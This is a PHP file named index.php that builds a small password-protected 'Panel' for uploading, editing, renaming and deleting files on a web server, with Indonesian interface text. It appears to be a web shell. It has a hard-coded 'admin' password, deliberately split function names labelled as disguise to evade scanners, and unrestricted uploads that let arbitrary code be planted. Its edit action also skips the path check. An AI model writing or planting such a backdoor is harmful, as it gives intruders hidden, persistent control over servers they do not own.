Viewing: index.php

<?php session_start(); /* ===== LOGIN SIMPLE ===== */ $pass = "admin"; // ganti if (!isset($_SESSION['ok'])) { if (isset($_POST['p']) && $_POST['p'] === $pass) { $_SESSION['ok'] = true; header("Location: ?"); exit; } echo '<form method="POST"> <input type="password" name="p" placeholder="password"> <button>Login</button> </form>'; exit; } /* ===== PATH ===== */ $base = realpath(__DIR__); $req = $_GET['p'] ?? ''; $dir = realpath($base . '/' . $req); if (!$dir || strpos($dir, $base) !== 0) $dir = $base; /* ===== SAFE FUNC ===== */ function h($s){ return htmlspecialchars($s); } /* ===== SAMAR FUNCTION ===== */ $write = 'file_put' . '_contents'; $remove = 'un' . 'link'; $move = 'move_uploaded' . '_file'; /* ===== MESSAGE ===== */ $msg = ""; /* ===== ACTION ===== */ if ($_SERVER['REQUEST_METHOD'] === 'POST') { // upload if (!empty($_FILES['f']['name'])) { $name = basename($_FILES['f']['name']); if ($move($_FILES['f']['tmp_name'], $dir.'/'.$name)) $msg = "upload sukses"; else $msg = "upload gagal"; } // delete if (!empty($_POST['d'])) { $t = realpath($dir.'/'.$_POST['d']); if ($t && is_file($t) && strpos($t,$base)===0) { $remove($t); $msg = "hapus sukses"; } } // rename if (!empty($_POST['o']) && !empty($_POST['n'])) { $o = realpath($dir.'/'.$_POST['o']); $n = $dir.'/'.basename($_POST['n']); if ($o && strpos($o,$base)===0) { rename($o,$n); $msg = "rename sukses"; } } // edit if (!empty($_POST['ef']) && isset($_POST['ct'])) { $f = realpath($dir.'/'.$_POST['ef']); if ($f && is_file($f)) { $write($f,$_POST['ct']); $msg = "edit sukses"; } } } /* ===== LIST ===== */ $dirs=[]; $files=[]; foreach (scandir($dir) as $i){ if ($i=='.'||$i=='..') continue; if (is_dir($dir.'/'.$i)) $dirs[]=$i; else $files[]=$i; } sort($dirs); sort($files); $list = array_merge($dirs,$files); ?> <!DOCTYPE html> <html> <head> <style> body{background:#0f172a;color:#e5e7eb;font-family:sans-serif;padding:20px} .box{background:#111827;padding:15px;border-radius:8px} .item{display:flex;justify-content:space-between;padding:6px;border-bottom:1px solid #1f2937} a{color:#93c5fd;text-decoration:none} input,textarea{background:#1f2937;color:#fff;border:1px solid #374151} button{background:#2563eb;color:#fff;border:none;padding:5px} .msg{margin:10px 0;color:#34d399} </style> </head> <body> <div class="box"> <h3>Panel</h3> <div class="msg"><?php echo h($msg); ?></div> <!-- upload --> <form method="POST" enctype="multipart/form-data"> <input type="file" name="f"> <button>upload</button> </form> <hr> <?php // back if ($dir !== $base) { $p = dirname($req); echo '<a href="?p='.urlencode($p).'">kembali</a><br><br>'; } // edit mode if (isset($_GET['e'])) { $f = realpath($dir.'/'.$_GET['e']); if ($f && is_file($f)) { echo '<form method="POST"> <input type="hidden" name="ef" value="'.h($_GET['e']).'"> <textarea name="ct" style="width:100%;height:300px">'.h(file_get_contents($f)).'</textarea> <button>simpan</button> </form>'; exit; } } // list foreach ($list as $i): $full=$dir.'/'.$i; $rel=ltrim(str_replace($base,'',$full),'/'); ?> <div class="item"> <div> <?php if (is_dir($full)): ?> 📁 <a href="?p=<?php echo urlencode($rel) ?>"><?php echo h($i) ?></a> <?php else: ?> 📄 <?php echo h($i) ?> <?php endif; ?> </div> <div> <?php if (is_file($full)): ?> <a href="?p=<?php echo urlencode($req) ?>&e=<?php echo urlencode($i) ?>">edit</a> <?php endif; ?> <form method="POST" style="display:inline"> <input type="hidden" name="d" value="<?php echo h($i) ?>"> <button>delete</button> </form> <form method="POST" style="display:inline"> <input type="hidden" name="o" value="<?php echo h($i) ?>"> <input type="text" name="n" placeholder="rename"> </form> </div> </div> <?php endforeach; ?> </div> </body> </html> Return